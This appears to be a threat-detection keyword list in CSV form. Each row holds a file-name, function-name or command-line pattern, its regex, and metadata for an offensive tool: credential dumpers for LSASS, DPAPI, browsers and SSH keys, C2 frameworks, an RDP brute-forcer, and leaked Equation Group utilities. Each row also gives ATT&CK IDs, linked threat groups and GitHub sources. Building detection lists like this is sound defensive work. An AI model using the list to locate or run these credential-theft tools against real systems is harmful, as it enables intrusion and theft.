"*dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did.onion*",".{0,1000}dsbqrprgkqqifztta6h3w7i2htjhnq7d3qkh3c7gvc35e66rrcv66did\.onion.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","41582"
"*DSInternals_v4.*.zip*",".{0,1000}DSInternals_v4\..{0,1000}\.zip.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","41590"
"*dsnezhkov/shutter*",".{0,1000}dsnezhkov\/shutter.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","1","N/A","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","41591"
"*dsregcmd.exe /status*",".{0,1000}dsregcmd\.exe\s\/status.{0,1000}","offensive_tool_keyword","dsregcmd","dsregcmd.exe to check the SSO state which might indicate preparation for abusing Azure AD tokens","T1082 - T1087 - T1012","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","41593"
"*dsregcmd.exe /status*",".{0,1000}dsregcmd\.exe\s\/status.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","41594"
"*dswmiexec.exe*",".{0,1000}dswmiexec\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","41595"
"*dtd-finder*",".{0,1000}dtd\-finder.{0,1000}","offensive_tool_keyword","dtd-finder","Identify DTDs on filesystem snapshot and build XXE payloads using those local DTDs.","T1221 - T1228 - T1547","TA0005 - ","N/A","N/A","Exploitation tool","https://github.com/GoSecure/dtd-finder","1","0","N/A","N/A","N/A","7","625","109","2024-02-21T00:00:00Z","2019-07-15T20:13:54Z","41596"
"*dtmsecurity/bof_helper*",".{0,1000}dtmsecurity\/bof_helper.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","N/A","10","10","228","43","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z","41597"
"*DUAR_Survey_v3-cleanedx64.bin*",".{0,1000}DUAR_Survey_v3\-cleanedx64\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41598"
"*DUAR_Survey_v3-cleanedx86.bin*",".{0,1000}DUAR_Survey_v3\-cleanedx86\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41599"
"*DUAR_Survey_v4-cleanedx64.bin*",".{0,1000}DUAR_Survey_v4\-cleanedx64\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41600"
"*DUAR_Survey_v4-cleanedx86.bin*",".{0,1000}DUAR_Survey_v4\-cleanedx86\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","41601"
"*dubmoat*",".{0,1000}dubmoat.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41602"
"*Dubmoat_ExtractData*",".{0,1000}Dubmoat_ExtractData.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41603"
"*Dubmoat_PrintFilename*",".{0,1000}Dubmoat_PrintFilename.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41604"
"*Dubmoat_TruncateFile*",".{0,1000}Dubmoat_TruncateFile.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file  Anti forensic: Manipulate utmp","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Defense Evasion","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","41605"
"*DuBrute v*",".{0,1000}DuBrute\sv.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","41606"
"*dubrute.exe*",".{0,1000}dubrute\.exe.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","41607"
"*DUBrute_v*",".{0,1000}DUBrute_v.{0,1000}","offensive_tool_keyword","DUBrute","RDP  Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","41608"
"*DuckDuckC2-main*",".{0,1000}DuckDuckC2\-main.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","41609"
"*ducky_keyboard_sender(scancode*",".{0,1000}ducky_keyboard_sender\(scancode.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","41610"
"*DueDLLigence.cs*",".{0,1000}DueDLLigence\.cs.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","41611"
"*DueDLLigence.sln*",".{0,1000}DueDLLigence\.sln.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","41612"
"*DueDLLigence-master*",".{0,1000}DueDLLigence\-master.{0,1000}","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","N/A","10","5","469","89","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z","41613"
"*dump /service:krbtgt *",".{0,1000}dump\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","41615"
"*Dump AAD connect account credential in current context*",".{0,1000}Dump\sAAD\sconnect\saccount\scredential\sin\scurrent\scontext.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41616"
"*Dump AD Certificate Services data*",".{0,1000}Dump\sAD\sCertificate\sServices\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","41617"
"*Dump AD Integrated DNS data*",".{0,1000}Dump\sAD\sIntegrated\sDNS\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","41618"
"*Dump cookies from Chrome or Edge*",".{0,1000}Dump\scookies\sfrom\sChrome\sor\sEdge.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","41619"
"*Dump Credential Manager for all logged in users*",".{0,1000}Dump\sCredential\sManager\sfor\sall\slogged\sin\susers.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","41620"
"*Dump Kerberos tickets to file*",".{0,1000}Dump\sKerberos\stickets\sto\sfile.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","41621"
"*Dump looted SCCM secrets to specified directory*",".{0,1000}Dump\slooted\sSCCM\ssecrets\sto\sspecified\sdirectory.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41622"
"*Dump lsass.exe using MiniDumpWriteDump*",".{0,1000}Dump\slsass\.exe\susing\sMiniDumpWriteDump.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","41623"
"*Dump SCCM secrets from WMI requests results*",".{0,1000}Dump\sSCCM\ssecrets\sfrom\sWMI\srequests\sresults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41624"
"*dump_chrome_user*",".{0,1000}dump_chrome_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41625"
"*dump_CREDENTIAL_MSOFFICE*",".{0,1000}dump_CREDENTIAL_MSOFFICE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41626"
"*dump_CREDENTIAL_TASKSCHEDULER(*",".{0,1000}dump_CREDENTIAL_TASKSCHEDULER\(.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41627"
"*dump_CREDENTIAL_TASKSCHEDULER*",".{0,1000}dump_CREDENTIAL_TASKSCHEDULER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41628"
"*dump_CREDENTIAL_TSE*",".{0,1000}dump_CREDENTIAL_TSE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41629"
"*dump_domain*",".{0,1000}dump_domain.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","41630"
"*dump_exported_functions(library,dll_orig)*",".{0,1000}dump_exported_functions\(library,dll_orig\).{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41631"
"*dump_firefox_user*",".{0,1000}dump_firefox_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41632"
"*dump_google_password()*",".{0,1000}dump_google_password\(\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","41633"
"*dump_jenkins*",".{0,1000}dump_jenkins.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41634"
"*dump_keepassx*",".{0,1000}dump_keepassx.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41635"
"*dump_lsass(*",".{0,1000}dump_lsass\(.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41636"
"*dump_lsass*",".{0,1000}dump_lsass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","41637"
"*dump_lsass.js*",".{0,1000}dump_lsass\.js.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41638"
"*dump_owamailbox(*",".{0,1000}dump_owamailbox\(.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#content","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","41639"
"*dump_process(*lsass.exe*)*",".{0,1000}dump_process\(.{0,1000}lsass\.exe.{0,1000}\).{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41640"
"*dump_sam(*",".{0,1000}dump_sam\(.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","41641"
"*dump_secrets.py*",".{0,1000}dump_secrets\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","41642"
"*dump_ssh_keys*",".{0,1000}dump_ssh_keys.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41643"
"*dump_tomcat*",".{0,1000}dump_tomcat.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41644"
"*dump_VAULT_INTERNET_EXPLORER*",".{0,1000}dump_VAULT_INTERNET_EXPLORER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41645"
"*dump_VAULT_NGC_LOCAL_ACCOOUNT*",".{0,1000}dump_VAULT_NGC_LOCAL_ACCOOUNT.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41646"
"*dump_VAULT_WIN_BIO_KEY*",".{0,1000}dump_VAULT_WIN_BIO_KEY.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41647"
"*dump_webconf*",".{0,1000}dump_webconf.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41648"
"*dump_webpass*",".{0,1000}dump_webpass.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41649"
"*dump_wifi_wpa_*",".{0,1000}dump_wifi_wpa_.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41650"
"*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*",".{0,1000}dump_WPA\-PBKDF2\-PMKID_EAPOL\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41651"
"*dump_WPA-PMKID-PBKDF2.hashcat*",".{0,1000}dump_WPA\-PMKID\-PBKDF2\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41652"
